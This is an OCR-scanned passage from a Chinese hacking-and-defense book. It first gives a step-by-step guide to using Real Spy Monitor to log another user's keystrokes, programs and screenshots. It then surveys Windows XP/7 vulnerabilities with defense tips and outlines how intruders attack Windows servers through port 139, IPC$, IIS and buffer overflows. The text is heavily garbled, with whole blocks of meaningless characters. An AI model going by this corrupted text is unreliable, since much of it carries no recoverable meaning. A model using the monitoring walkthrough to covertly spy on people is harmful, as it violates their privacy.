可 看 到 列表 里 的 37 个 网 址 , 即 刚 刚 使 用 IE 浏 览 
器 打开 的 网 页 。 




















Delete We fi¥video,.sina,com, cnfent/sih/2... http:/ivideo.sina.co.., Adminis,,. 2009-6-12 9:03:41 
明星 全 接 串 影音 - Micr... http:/ifent.sina.com.... Adminis... 2009-6-12 9:03:43 
A Microsoft Internet Explorer http:jfwww.qq.com; Adminis.,. 2009-6-12 9:03:54 
httn: tnn.Awsns.crnm! - Mirrnsnft T.., httn:lfnn.ewens.cam! Adminis... 2nno-6-12 0:n4:21 六 
Reset 
四 
Output 


Selectitem and press "Execute” to visit wehsites. 


© 


提示 


@ Set Listhox 和 nt Color Set Texthox font Color 





如 果 想 要 深入 查看 网 页 内 容 ， 只 
浏览 器 访问 相应 的 网 页 。 


需要 双击 列表 中 的 网 址 ， 即 可 自动 打开 IE 





NTZI 一 _ 





攻防 从 入 门 到 精通 


-于 对 





今世 
键盘 输入 内 容 监控 

0 内 容 进 行 监 控 通 常 是 木马 做 的 事 ， 但 Real Spy Monitor 为 了 让 目 身 的 
监控 功能 变 得 更 加 强大 也 提供 了 此 功能 。 其 针对 键盘 输入 内 容 进 行 监控 的 具体 操作 步骤 
如 下 。 


STEP01: 使 用 键盘 输入 一 些 信息 


S 加 可 本 
ee Real Spy Monitor Bulid 2.93 
Powerful PC Spy-Monitoring-Security Software Monitoring Status: Not Active 


Options PC Activity Internet Buttons 
General Setting Keystrokes Typed o MSN Messenger 总 
Startup Settings 23 Keystrokes Logged \ 0 Conversations Start Monitor 按 下 所 设 的 < Ctrl 十 Alt+ R 5 4 ) 在 弹 出 的 


Stop Monitor) 








Rao RY was BB me i 对 话 框 中 输入 所 设置 的 密码 , 调 出 " Real Spy 
Serrat\ FP Doe El $+ wnaows tooned er = 全 Monitor" 主 窗口 , 此 时 可 以 发 现 “Keystrokes 
一 Typed 项 下 已 经 有 了 计数 。 
Setting 
se 国 | CE 可 以 看 出 计数 为 23, 表示 有 23 条 记录 ， 选择 “Key 
Fear Users A as YAHOOINMaAIY Es strokes Typed” 选 项 。 
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STEP02: 查看 记录 信息 STEP03: 打开 记事 本 


Select what you want to view: 到 temp.txt - 记事 本 
i 咽 Keyatrokes 回访 wos 戈 wi 3 Programs es > Peabas 文件 ( 编辑 (E) 格式 (O) 但 者 (W) 帮助 (H) 


FE Title Username Time 微 淘 汐 宝 搜 索 


Eenuts 
与 盾 一 黑客 就 这 几 : Administrator 2013/11/1 16:22... . - - 
2 ER doc - Mi Admmetator 2013/1111 10:23-~ #J] relative#] relativeH#J relative 一 
Tileless Wind Administrat 2013/11/1 16:24... 三 > 
Tieless Windows Admnttrator 2013/11/1 16:24- Windows Internet Explorer 


i (Administrator @ 2013/11/1 17:14:06) 
-Mi.. Administrator 2013/11/1 16:26... 
Administrator 2013/11/1 16:27... 
bd 把 术 doc - Mi... Administrator 2013/11/1 16:27... 
Administrator 2013/11/1 16:27... 


本 人 Administrator 2013/11/1 16:27... 
第 ? 管 _ 扫描 与 语 扫 据 拓 术 .doc - Mi.. Administrator _ 2013111/1 16:28... [Enterj 


Output 


Press "Find" to search what You're interesting- 个 Set Listhox font Color 








双击 其 中 任意 一 条 记录 。 可 以 看 出 Administrator 用 户 输 入 的 信息 及 输入 时 
间 。 
STEP04: 捕获 《Ctrl》 类 快捷 键 


本 temptxt -记事 本 wa 
文件 (站 ”编辑 (E) “格式 (DO) 查看 (V) 帮助 (H) 
第 ?篇 ” 扫 换 与 反 扫 反 技 术 . doc 一 Microsoft 
Word bd @ 2013/11/1 
16:57:55 ST ei 
如 果 用 户 按 了 <Ctrl > 类 的 快捷 键 , 则 


[Ctrl1] [LAlt] [Alt] [LAlt] LAlt] [AlIt] [Alt] ,， ~、 所 \ - 
[Alt]TALtJ[AItJ[ALt]TALtJTAItJTAlt] Real Spy Monitor 同 样 可 以 捕获 到 。 


[Alt][Alt][Alt][LaAlt][aAlt][Alt] [Alt] 


[Alt]j[AltjLAlt]LaAltLaAlt]LaAltLaAlt] [Altj 





$5. 程序 执行 情况 监控 
如 果 想 知道 用 户 在 计算 机 中 运行 了 哪些 程序 ， 只 和 需 在 “Real Spy Monitor” 主 窗口 中 单 
击 “Programs Executed” 图 标 ， 即 可 在 弹出 的 “Report” 窗 口中 看 到 运行 的 程序 名 和 路 径 。 


66 
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信息 的 扫描 与 嗅 探 








Select what you Want 中 view: 


入 国 Keystrokes 局 六 Ww 恒 ， 只 


application Run 


C:\Program Files\360\360Safe\safe... 
C:\Program Files\360\360Safe\safe... 
C:\Program Files\360\3605afe\safe... 
C:\Program Files\360\360Safe\safe... 
C:\Program Files\360\3605afe\vsafe... 
C'\Windows\system32\SearchFitter... 


D:\Real Spy Monitor\winrsm.exe 
D:\Real Spy Monitor\winrsm.exe 


C:\Program Files\SogouInput\Sogo... 
C:\Program Files\SogouInput\6,7.0,... 


Username | 
Administra... 
Administra... 
Administra.,. 
Administra... 
Administra.,， 
Administra... 
Administra... 
Administra.,， 
Administra... 
Administra,,， 


3 programs 9 gle > Heat 


End Time 


2013/11/1 16:23... 
2013/11/1 16:24... 


Start Time 


2013/11/1 16:23... 
2013/11/1 16:23... 
2013/11/1 16:24... 
2013/11/1 16:24... 
2013/11/1 16:24... 
2013/11/1 16:27... 
2013/11/1 16:27... 
2013/11/1 16:27... 
2013/11/1 16:27... 
2013/11/1 16:27... 


2013/11/1 16:24... 
2013/11/1 16:24... 
2013/11/1 16:29... 
2013/11/1 16:27... 
2013/11/1 16:27... 
2013/11/1 16:28... 
2013/11/1 16:28,.. 


C:\Program Files\SogouInput\6.7.0...，Administra.,， 2013/11/1 16:28... 
ND'\Real Snv Mnnitnr\winrsm. exe Ardministra... 2N13/11/1 16:28... 





Qutput 


< 


Select item and press "Execute" to start program. 合 Set Listbox font Color Set Textbox font Color 








“Programs Executed ”的 “Report” 窗 口 


6. 即时 巩 图 监控 

用 户 可 以 通过 Real Spy Monitor 的 即时 截图 监控 功能 ( 
知 用 户 的 操作 有 历史。 

监控 即时 规 图 的 具体 操作 步 


STEPO1: 


棒 认 为 一 分 钟 截 一 次 图 ) 来 但 





又 如 下 。 


打开 “Real Spy Monitor” 主 窗口 STEP02: 查看 记录 的 操作 


= Reporl 
Select what you want to view: 


[| s 中 证 | 
党 咽 Keystrokes wa 好 . 品 2 Programs 








ou 





ee RealSpy Monitor Bulid 2.93 
Powerful PC Spy-Monitoring-Security Software Monitoring Status: Not Actve 


| 总 责 Peeps 





Options PC Activity Internet Butions 
Windows Title | Username Time 
General Setting | 图 Keystrokes Typed MSN Messenger a Execute 第 2 篇 扫描 与 皮 扫 描 技 术 .d.., Administrator 2013/11/1 16:26... 
Startup Settings = 0 Keystrokes Logged 0 Conversations Start Mo nitor ) Program Manager Administrator 2013/11/1 16:27... 
) |Program Manager Administrator 2013/11/1 16:28... 
- = em Titleless Windows Administrator 2013/11/1 16:29... 
Websites Visited ICQ Messenger (stp vonitr) Find 第 2 篇 扫描 与 皮 扫 描 技术 .d... Administrator 2013/11/1 16:30... 
En Configure logging options 0 Websites Logged 0 Conversations 百度 知道 搜索 _Real Spy M..。 Administrator 2013/11/1 16:31... 
多 第 2 入 扫 所 与 反 扫 所 技术 - d... Administrator 2013/11/1 16:32.… |s 
~ - 站 村 术 ,d Administrato 0 
Ey ee NO See : Delete [Ea ry 
Set Email \ FTP Delivery 0 Windows Logged 0 Conversations Messenger 人 美玲 姐姐 万 圣 节 化 身 全 户 新 ..。Administrator 2013/11/1 17:03... 
网 易 - Windows Intemet ..，Admhinistrator 2013/11/1 17:04... 民 
卉 Screen Spy {7 Programs Executed Yahoo! Messenger € Web Mail @ 
Record snapshots activity £3 | Application Logged 0 Conversations Reset “| 新浪 首 页 - Windows Internet Explbrer < 
Administrator 


a 
人 settng ] 2013/11/1 17:02:51 
人 Register 

€ Hp 


总 Hotkey choice 
Set your own hotkey 


Content Filtering 
Fiter User s Activitys 


Output 


Screen Snapshots 
0 Snapshots Logged 
Accessed 


« b 


Double Click item to View Snapshots 全 Set Listbox font Color Set Textbox font Color 
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选择 可 看 到 Real Spy Monitor 记 录 的 操作 ， 双 击 其 中 任 
意 一 项 截图 记录 。 


以 Windows 图 片 和 传真 查看 器 查看 


“Screen Snapshots” 选 项 。 


STEPO3: 


村 坊村 请 生 es 本 se wae 
料 字 逢 赎 心 各 宁 区 对 水 归期 字 汪 全 宁 且 并 : 负 欠 半生 县 。 ， 人 民 日 恨 : “免费 ” 区 六 山寺 让 两 对 
机 证 大 了 亚 尼 身材 大 用 裕 李 其 昌 气 第 污 玫 区 热 ( 因 舟 于 | 羽 济 ， 滩 得 厅 0 77 站 八重 入 愉 丰 护 全 
史 间 筷 访 靖 厌 地 入 :我 们 部 季 寻 3 各 放 六 十 志 公示 去 加 他 入 新 ;0 有 9319、 人 NI 中 股本 要 7 古村 让 
医 EE 妇 得 二 季 好 = 皮 用 嫩 异 江 居 ocr 涛 入 了 灶 4“ 雪 十 月 慎 叶 ， 中 竣 下 小 这 站 潜 闪 其 卜 琅 江 ( 身 > 和 
“pr 国 于 秆 一 可 女儿 各 力 罗 的 9r eo 六 要 关 性 用 和》 从 理 8 北京 进入 高 南 相 时代， 年 如 :ov 白领 无 过 条 二 
情 克 女 量 人 性 所 未 田 胆 要 下 老 村 三 圾 全 肥 内 全 肌理 坟 博导 。 汶 各 下 加 关系 成 IIR 业 守 本 用 水 3 二 运动 


我 知 和 加 天 你 喜 父 


可 以 看 到 所 截 的 图 。 





革 全 间 利 宙 全 池上 侣 何 竹 入? 生理 尔 天 加 十 学 为 什么 只 伍 郑 叶 半 
马 未 审 : 下 百人 丰 币 入 诺 此 委 人 党 大 基 旦 估 是 生计 已 完 必 和 名 要 
商 轩 大 他 为 同 竺 和 鞍 乏 少 中居 池 主 富 放 要 垃 执 要 斗 飞 二 颖 无 性子 受 


上 上 下 下 下 有 县 直 正 二 史 宇 江 李 六 和 二 王 任 号 基 入 于 可 二 和 了 
论 人 交角 小 安 寺 信人 的 语言 号 类 国 工 持 牧 王 华 酝 放 放 过。 人 折 。 共 好 入 与 个 斤 子 情事 如 性 与 N 了 无 入 去 字 其 入 攻 
1E 两 有 jp 本 吧 末 之 地 (下 | 且 历 对 清关 需 : 元 各 起 动 。 贞 拖 《一 卢 》 全 三 2 出征 对 人 到 生硬 和 8 之 放 
“本 国语 访 : 骨 失 二 的 女 训 门人 高 两 由 迁 记 严 汇 约 站 伏 站 加 精 由 > 全民 区 力 焕 宁国 后 人 本 辣 清 让 总 东 格 粘 | 
所 二 法 性 ETP55 十 吧 叶 康 关 信 审 天才 革 罗江 














显然 ，Real Spy Monitor 的 功能 是 极其 强大 的 。 使 用 它 对 系统 进行 监控 ， 网 管 将 会 轻松 
很 多 。Real Spy Monitor 在 一 定 程度 上 为 网 管 监控 系统 中 是 否 有 黑客 入 侵 市 来 极 大 的 方便 。 
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系统 漏洞 攻防 


随 着 Windows 的 广泛 使 用 ， 新 的 漏洞 不 断 被 用 户 发 现 ， 微 软 也 不 断 推出 新 
的 修补 程序 和 安全 加 密 程序 ， 但 用 户 未 必 知 道 所 有 的 系统 漏洞 该 如 何 修 补 ， 这 
就 给 了 黑客 可 有 来 之 机 、 


O Windows 系统 常见 漏洞 

O 入 侵 Windows 服务 器 的 流程 曝光 
O ”NetBIOS 漏洞 攻防 

O DcomRpe 漏洞 入 侵 曝 光 

O 用 MBSA 检测 系统 漏洞 


O Windows Update 修复 系统 漏洞 
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系统 漏洞 攻防 


3.1 系统 漏 洞 基础 若 识 


系统 漏洞 也 称 安全 缺陷 ， 这 些 安全 缺陷 会 被 入 侵 者 所 利用 ， 从 而 达到 控制 目标 主机 或 
造成 一 些 人 破坏 的 目的 。 








3.1.1 系统 漏洞 概述 


几乎 所 有 操作 系统 的 默认 安装 (Default Installation) 都 没有 被 配置 成 最 理想 的 安全 状 
态 ， 即 出 现 了 漏 筒 。 漏 洞 是 指 应 用 软件 或 操作 系统 软件 在 滥 辑 设计 上 的 缺陷 或 在 编 与 时 产 
生 的 错误 。 和 在 某 个 程序 〈 包 括 操作 系统 ) 在 设计 时 未 考虑 周全 ， 则 这 个 缺陷 或 错误 将 可 以 
锌 不 法 者 或 黑客 利用 ， 通 过 植 入 木马 、 病 毒 等 方式 攻击 或 控制 整个 计算 机 ， 从 而 锁 取 计算 
机 中 的 重要 资料 和 信息 ， 甚 至 破坏 系统 。 

漏洞 是 硬件、 软件 、 协 议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ， 从 而 可 以 使 攻击 
者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 漏 洞 会 影响 到 很 大 范围 的 软 便 件 设备 ， 包 括 系 
统 本 身 及 文 撑 软件 、 网 络 用 户 和 服务 占 软 件 、 网 络 路 由 器 和 安全 防火 墙 等 。 换 言 之 ， 在 这 
些 不 同 的 软 、 便 件 设 备 中 ， 都 可 能 存在 不 同 的 安全 漏洞 问题 。 

在 不 同 种 类 的 软 、 人 硬件 设备 及 设备 的 不 同 版 本 之 间 ， 由 不 同 设备 构成 的 不 同系 统 之 
间 ， 以 及 同 种 系统 在 不 同 的 设置 条 件 下 ， 都 会 存在 各 目 不 同 的 安全 漏洞 问题 。 系 统 漏 酒 
又 称 安全 缺陷 ， 可 对 用 户 造 成 不 恨 后 果 。 如 漏洞 被 恶意 用 户 利 用 ， 则 会 造成 信息 泄漏 ; 
黑客 攻击 网 站 即 利用 网 络 服务 右 操 作 系 统 的 漏洞 ， 对 用 户 操作 造成 不 便 ， 如 不 明 原 因 的 
死机 和 丢失 文件 等 。 





















































3.12 Windows 操作 系统 常见 漏洞 


1. Windows XP 操作 系统 常见 漏洞 

Windows XP 操作 系统 常见 的 漏洞 有 UPnP (Universal Plug and Play， 通 用 即 插 即 用 ) 
服务 漏洞 、 升 级 程序 漏洞 、 帮 助 和 文 持 中 心 漏洞 、 压 缩 文件 夹 漏 铜 、 服 务 拒 绝 漏 洞 、Windows 
Media Player 漏洞 、RDP 漏洞 、VM 漏洞 、 热 键 漏洞 、 账 所 快速 切换 漏洞 等 。 

(1) UPnP 服务 漏洞 

漏洞 描述 : 允许 攻击 者 执行 任意 指令 。 

Windows XP 默认 局 动 的 UPnP 服务 存在 严重 安全 漏洞 。UPnP 体系 面 问 无 线 设备 、PC 
和 智能 应 用 ， 提 供 普 过 的 对 等 网 络 连 接 ， 在 家 用 信息 设备 、 办 公用 网 络 设 备 间 提供 TCP/IP 
连接 和 Web 访问 功能 。 该 服务 可 用 于 检测 和 集成 UPnP 使 件 。 

UPnP 协议 存在 安全 漏洞 ,使 攻击 者 可 非法 获取 任何 Windows XP 的 系统 级 访问 进行 攻 
击 ， 还 可 通过 控制 多 台 Windows XP 机 器 发 起 分 布 式 的 攻击 。 

防御 策略 : 禁用 UPnP 服务 后 下 载 并 安装 对 应 的 补丁 程序 。 

(2) 升级 程序 漏洞 

漏 铀 描述， 如 将 Windows XP 升级 至 Windows XP Pro，IE 会 重新 安装 ， 以 前 打 的 补丁 
程序 将 被 全 部 清除 。 


oo 



































最 [四 1 
未 全- 攻防 从 入 门 到 精通 
售 人 他 他 





Windows XP 的 升级 程序 不 仅 会 删除 了 正 的 补丁 文件 ， 还 会 导致 微软 的 升级 服务 需 无 法 
正确 识别 正 是 否 存在 缺陷 ， 即 Windows XP Pro 操作 系统 存在 两 个 潜在 威胁 : 
@ 东 些 网 页 或 HIML 邮件 的 脚本 可 自动 调用 Windows 的 程序 。 
@ 可 通过 IE 漏洞 血 视 用 户 的 计算 机 文件 。 
防御 策略 : 如 下 浏览 右 未 下 载 升 级 补丁 ， 可 至 微软 网 站 下 载 最 新 补丁 程序 。 
(3) 帮助 和 文 持 中 心 漏洞 
漏 铜 摘 述 : 删除 用 户 系 统 的 文件 。 
帮助 和 文 持 中 心 提 供 集 成 工具 ， 用 户 可 获取 针对 各 种 主题 的 帮助 和 文 持 。 在 Windows 
XP 帮助 和 文 持 中 心 存 在 漏洞 ,可 使 攻击 者 跳 过 特殊 网 页 (在 打开 该 网 页 时 调用 错误 的 函数 ， 
并 将 存在 的 文件 或 文件 夹 名 字 作 为 参数 传送 ) 使 上 传 文件 或 文件 夹 的 操作 失败 ， 随 后 该 网 
页 可 在 网 站 上 公布 ， 以 攻击 访问 诅 网 站 的 用 户 或 被 作为 邮件 传播 来 攻击 。 谤 漏洞 除 使 攻击 
者 可 删除 文件 外 不 会 赋予 其 他 权利 ， 攻 击 者 既 无 法 获取 系统 管理 员 的 权限 ， 也 无 法 该 取 或 
修改 文件 。 
防御 策略 : 安装 Windows XP 的 Service Pack 3。 
(4) 压缩 文件 夹 漏洞 
漏洞 描述 : Windows XP 压缩 文件 夹 可 按 攻 击 者 的 选择 运行 代码 。 
在 安装 有 “Plus” 包 的 Windows XP 操作 系统 中 ,“ 压 缩 文件 严 ” 功 能 允许 将 Zip 文件 
作为 普通 文件 夹 处 理 。“ 压 缩 文件 夹 ” 功 能 存在 两 个 漏洞 ， 如 下 所 述 : 
@ 在 解压 缩 Zip 文件 时 会 有 未 经 检查 的 缓冲 存在 于 程序 中 以 存放 被 解压 文件 ， 因 此 很 
可 能 导 伊 浏览 器 骨 江 或 攻击 者 的 代码 被 运行 。 
@ 解压 缩 功能 在 非 用 户 指 定 目 录 中 放置 文件 ， 可 使 攻击 者 在 用 户 系统 的 已 知 位 置 中 放 
置 文件 。 
防御 策略 : 不 接收 不 信任 的 邮件 附件 ， 也 不 下 载 不 信任 的 文件 。 
(5) 服务 拒绝 漏洞 
漏洞 朱 述 : 服务 拒绝 。 
Windows XP 文 持 点 对 点 的 协议 (PPTP) 作为 远程 访问 服务 实现 的 虚拟 专用 网 技术 。 
由 于 在 其 控制 用 于 建立 、 维 护 和 拆 开 PPTP 连接 的 代码 段 中 存在 未 经 检查 的 缓存 ， 导致 
Windows XP 的 实现 中 存在 漏洞 。 通 过 癌 一 台 存 在 该 漏洞 的 服务 右 发 送 不 正确 的 PPTP 控制 
数据 ， 攻 击 者 可 损坏 核心 内 存 并 寻 致 系统 失效 ， 中 断 所 有 系统 中 正在 运行 的 进程 。 议 漏洞 
可 攻击 任何 一 全 提供 PPTP 服务 的 服务 右 ， 对 于 PPTP 客户 闫 的 工作 站 ， 攻 击 者 只 需 诉 活 
PPTP 会 话 即 可 进行 攻击 。 对 任何 遭 到 攻击 的 系统 ， 可 通过 重启 来 恢复 正常 操作 。 
防御 案 略 : 关闭 PPTP 服务 。 
(6) Windows Media Player 漏洞 
漏洞 描述 : 可 能 导致 用 户 信 息 的 泄漏 ， 脚 本 调用 ; 绥 存 路 径 泄 漏 。 
Windows Media Player 漏洞 主要 产生 两 个 问题 : 一 是 信息 泄漏 漏洞 ， 它 给 攻击 者 提供 
了 一 种 可 在 用 户 系 统 上 运行 代码 的 方法 ， 微 软 对 其 定义 的 严重 级 别 为 “严重 二 是 脚本 的 
行 漏洞 ， 当 用 户 选择 播放 一 个 特殊 的 媒体 文件 ， 接 独 又 浏览 一 个 特殊 建造 的 网 页 后 ， 攻 击 
者 驶 可 利用 议 漏 洞 运行 脚本 。 由 于 该 漏洞 有 特别 的 时 序 要 求 ， 因 此 利用 该 漏洞 进行 攻击 相 
对 就 比较 困难 ， 它 的 严重 级 别 也 束 比 较 低 。 
防御 策略 : 将 要 播放 的 文件 先 下 载 到 本 地 再 播放 ， 即 可 不 受 利 用 此 漏洞 进行 的 攻击 的 
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系统 漏洞 攻防 


影 啊 。 

(7) RDP 漏洞 

源 洞 换 述 : 信息 泄露 并 拒绝 服务 。 

Windows 操作 系统 通过 RDP (Remote Data Protocol) 为 客户 端 提供 远程 终端 会 话 。RDP 
协议 将 终端 会 话 的 相关 便 件 信息 传送 至 远程 客户 端 ， 其 漏洞 如 下 所 述 : 

@ 与 某 些 RDP 版 本 的 会 话 加 密实 现 有 关 的 漏洞 .所 有 RDP 实现 均 允 许 对 RDP 会 话 中 

的 数据 进行 加 密 , 在 Windows 2000 和 Windows XP 版 本 中 , 纯 文 本 会 话 数 据 的 校 验 
在 发 送 前 并 未 经 过 加 密 ， 窃 听 并 记录 RDP 会 话 的 攻击 者 ， 可 对 该 校 验 密 码 分 析 攻 
击 并 和 窗 亲 该 会 话 传 输 。 

@ 与 Windows XP 中 的 RDP 实现 对 某 些 不 正确 的 数据 包 处 理 方 法 有 关 的 漏洞 。 当 接收 

这 些 数据 包 时 ， 远 程 果 面 服务 将 会 失效 ， 同 时 也 会 导致 操作 系统 失效 。 攻 击 者 同一 
个 已 受 影响 的 系统 发 送 这 类 数据 包 时 ， 并 不 需要 经 过 系统 验证 。 

防御 策略 : Windows XP 默认 并 未 局 动 它 的 远程 果 面 服务 。 即 使 远程 加 面 服务 局 动 ， 
只 需 在 防火 墙 中 屏蔽 3389 端口 ， 即 可 避免 该 攻击 。 

(8) VM 漏洞 

漏洞 描述 : 可 能 造成 信息 泄露 ， 并 执行 攻击 者 的 代码 。 

攻击 者 可 通过 癌 JDBC 类 传送 无 效 的 参数 使 条 主 应 用 程序 骨 泪 , 攻击 者 须 在 网 站 上 拥 
有 恶意 的 Java applet 并 引诱 用 户 访 问 该 站 点 。 和 恶意 用 户 可 在 用 户 机 器 上 安装 任意 DLL， 并 
执行 任意 的 本 机 代码 ， 洪 在 地 破坏 或 谈 取 内 存 数 据 。 

防御 策略 经 党 进行 相关 软件 的 安全 更 新 。 

(9) 热 键 漏洞 

漏 铜 摘 述 : 设置 热 键 后 ， 由 于 Windows XP 的 目 注 销 功 能 ， 可 使 系统 “ 假 注销 ” 其 他 
用 户 即 可 通过 热 键 调用 程序 。 

热 键 功能 是 系统 提供 的 服务 ， 当 用 户 离 开 计 算 机 后 ， 鹰 计算 机 即 处 于 未 保护 情况 下 ， 
此 时 Windows XP 会 目 动 实施 “ 目 注 销 ” 虽然 无 法 进入 蝎 面 ， 但 由 于 热 键 服务 还 未 停止， 
因此 仍 可 使 用 热 键 启动 应 用 程序 。 

防御 案 上 略 : 

1〉 由 于 该 汤 洞 被 利用 的 机 提 为 热 键 可 用 ， 因 此 须 检查 可 能 带 来 危害 的 程序 和 服务 的 
热 刍 。 

2) 启动 屏 磊 保护 程序 ， 并 设置 密 公 。 

3) 在 离开 计算 机 时 锁定 计算 机 。 

(10) 账号 快速 切换 漏洞 

漏洞 描述 : Windows XP 快速 账号 切换 功能 存在 问题 ， 可 造成 账号 锁定 ， 使 所 有 非 管理 
员 账 号 均 无 法 登录 。 

Windows XP 系统 设计 了 账号 快速 切换 功能 , 使 用 户 可 快速 地 在 不 同 的 账号 间 切 换 , 但 
其 设计 存在 问题 ， 可 被 用 于 造成 账号 锁定 ， 使 所 有 非 管 理 员 账 号 均 无 法 登录 。 配 合 账号 锁 
定 功能 ， 用 户 可 利用 账号 快速 切换 功能 ， 人 快速 重 试 登 录 另 一 个 用 户 名 ， 系 统 则 会 判别 为 其 
力 破 解 ， 从 而 导致 非 管理 员 账 号 锁 完 。 

2. Windows 7 操作 系统 常见 漏洞 

与 Windows XP 相 比 ，Windows 7 操作 系统 中 的 漏洞 就 少 了 很 多 ，Windows 7 操作 系统 
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EE 
取 py = > 
Sk E> 攻防 从 入 门 到 精通 
全 人 人 他 

中 和 常见 的 漏洞 有 快捷 方式 漏洞 与 SMB 协议 漏洞 。 

1) 快捷 方式 漏洞 

漏洞 描述 ， 快捷 方式 漏洞 是 Windows Shell 框架 中 存在 的 一 个 危急 安全 漏洞 ， 在 
Shell32.dll 的 解析 过 程 中 ， 会 通过 “快捷 方式 ”的 文件 格式 去 逐个 解析 ， 即 首先 找到 快捷 方 
式 所 指向 的 文件 路 径 ， 接 着 找到 快捷 方式 依赖 的 图 标 资源 。 这 样 ，Windows 桌面 和 开始 菜 
单 上 就 可 以 看 到 各 种 漂亮 的 图 标 ， 当 用 户 双击 这 些 快捷 方式 时 ， 就 会 执行 相应 的 应 用 程序 。 

微软 Lnk 漏洞 就 是 利用 了 系统 解析 的 机 制 ， 攻 击 者 恶意 构造 一 个 特殊 的 Lnk (快捷 方 
式 ) 文件 ， 精 心 构 造 一 串 程序 代码 来 “ 骗 过 ”操作 系统 。 当 Shell32.dll 解析 到 这 串 编码 的 
时 候 ， 会 认为 这 个 “快捷 方式 ”依赖 一 个 系统 控件 (dll 文件 )， 于 是 将 这 个 “系统 控件 ” 
加 载 到 内 存 中 执行 。 如 果 这 个 “系统 控件 ”是 病毒 ， 那 么 Windows 在 解析 这 个 Lnk( 快 捷 
方式 ) 文件 时 ， 就 把 病毒 激活 了 。 该 病毒 很 可 能 通过 USB 存储 器 进行 传播 。 

防御 策略 : 禁用 USB 存储 器 的 自动 运行 功能 ， 并 且 手 动 检查 USB 存储 器 的 根 文件 夹 。 

2) SMB 协议 漏洞 

SMB 协议 主要 是 作为 Microsoft 网 络 的 通信 协议 ， 用 于 在 计算 机 间 共 享 文件 、 打 印 机 、 
串口 等 。 当 用 户 执行 SMB2 协议 时 ， 系 统 将 会 受到 网 络 攻击 从 而 导致 系统 衣 溃 或 重启 。 
此 只 要 故意 发 送 一 个 错误 的 网 络 协议 请 求 ，Windows 7 操作 系统 融会 出 现 页 面 错 误 ， 从 而 
导 伊 监 屏 或 死机 。 

防御 策略 : 关闭 SMB 服务 。 





















































3.2 ”Windows 服务 器 系统 入 侵 曝 光 


Windows 服务 器 系统 包括 一 个 全 面 、 集 成 的 基础 结构 ， 旨 在 满足 开发 人 员 和 信息 技术 
(IT) 专业 人 员 的 要 求 。 此 系统 设计 用 于 运行 特定 的 程序 和 解决 方案 ， 借 助 这 些 程序 和 解决 
方案 ， 信 息 工 作 人 员 可 以 快速 便捷 地 获取 、 分 析 和 共享 信息 。 入 侵 者 对 Windows 服务 器 系 
统 的 攻击 主要 是 针对 IIS 服务 器 和 组 网 协议 的 攻击 。 




















3.2.1 入 侵 WindowWs 服务 器 的 流程 曝光 


一 般 情 况 下 ， 半 各 往往 喜欢 通过 下 网 所 示 的 流程 对 Windows 服务 占 进 行 攻击 ， 从 而 所 
高 入 侵 服 务 器 的 效率 。 

@ 通过 闹 口 139 进入 共享 磁 禹 。139 端口 是 为 “NetBIOS Session Service” 提 供 的 ， 主 
要 用 于 提供 Windows 文件 和 打印 机 共 孚 。 开 局 139 姗 口 虽 然 可 以 提供 共 孚 服务 ,但 
第 第 被 攻击 者 所 利用 进行 攻击 ， 如 使 用 流光 、SuperScan 等 端口 扫描 工具 可 以 扫 摘 
目标 计算 机 的 139 疹 口 ， 如 果 上 发 现 有 漏 铀 ， 可 以 试图 获取 用 户 名 和 密码 ， 这 是 非常 
危险 的 。 

@ 默认 共享 漏洞 I PC$ 入 侵 。IPC$ 是 Windows 操作 系统 特有 的 一 项 管理 功能 ， 是 微软 
公司 为 方便 用 户 使 用 计算 机 而 设计 的 ， 主 要 用 来 远程 管理 计算 机 。 但 事实 上 ， 使 用 
这 个 功能 最 多 的 人 不 是 网 络 管理 员 而 是 “入 侵 者 ” 他 们 通过 建立 IPC$ 连 接 与 远程 
主机 实现 通信 和 控制 。 通 过 IPC$ 连 接 的 建立 ， 入侵 者 能 够 做 到 建立 、 复 制 、 删 除 远 
程 计 算 机 文件 ， 也 可 以 在 远程 计算 机 上 执行 命令 。 
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系统 漏洞 攻防 
@ IIS (Internet Information Server ) 漏洞 入 侵 。 
IS 服务 为 Web 服务 器 提供 了 强大 的 i 
Internet 和 Intranet 服务 功能 。 主 要 通过 姗 成 功 
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期 以 来 , 攻击 IIS 服务 是 黑客 惯用 的 手段 ， Eee 
这 种 情况 多 是 由 于 企业 管理 者 或 网 管 对 IIS 泼 洞 入 侵 
安全 问题 关注 不 够 造成 的 。 rr 
者 和 特洛伊 木马 编写 者 偏爱 使 用 的 一 种 
攻击 方法 。 攻 击 者 或 病毒 着 于 在 系统 当中 
程序 获得 优先 级 ， 指 示 计 算 机 破坏 文件 、 a 
改变 数据 、 泄 露 敏感 信息 、 产 生 后 门 访 问 
点 、 感 染 或 攻击 其 他 计算 机 等 。 绥 冲 区 洲 
出 是 目前 导致 “黑客 ”型 病毒 横行 的 主要 
@ Serv-U 攻击 。Serv-U FTP Server 是 一 区 
在 Windows 平台 下 使 用 非常 广泛 的 FTP 
服务 器 因此 而 惨遭 黑客 入 侵 。 在 得 到 目标 计算 机 的 信息 之 后 ， 入 侵 者 束 可 以 使 用 木 
马 或 黑客 工具 进行 攻击 了 ， 但 这 种 攻击 必须 绕 过 防火 墙 才 可 以 成 功 。 
行文 件 ， 又 称 作 安 或 批 处 理 文 件 。 脚 本 通常 可 以 由 应 用 程序 临时 调用 并 执行 。 正 是 
因为 脚本 的 这 些 特点 ， 人 往往 被 一 些 别有用心 的 人 所 利用 。 在 脚本 中 加 入 一 些 破坏 计 
攻击 从 而 造成 严重 损失 。 
@ DDoS (Distributed Denial of Service， 分 布 式 拒绝 服务 ) 攻击 。 凡 是 能 导致 合法 用 户 
韭 党 明确 ， 束 是 要 了 咀 止 合法 用 户 对 正常 网 络 资源 的 访问 ， 从 而 达成 攻击 者 不 可 告 人 
的 目的 。 
在 软件 的 开发 阶段 ， 程 序 员 篆 篆 会 在 软件 内 创建 后 门 程序 以 便 可 以 修改 程序 设计 中 
的 缺陷。 但 如 果 这 些 后 门 被 其 他 人 知道 或 在 发 布 软件 之 前 没有 删除 后 门 程序 ， 它 职 


通过 端口 139 进 入 共享 磁盘 

口 80 来 完成 操作 , 因为 作为 Web 服务 器 ， Eee 

80 端口 总 要 打开 ， 具 有 很 大 的 威胁 性 。 长 my 
e@ 绥 冲 区 溢出 攻击 。 缓冲 区 溢出 是 病毒 编写 ee 

发 现 容易 产生 缓冲 区 溢出 之 处 , 运行 特别 

原因 。 

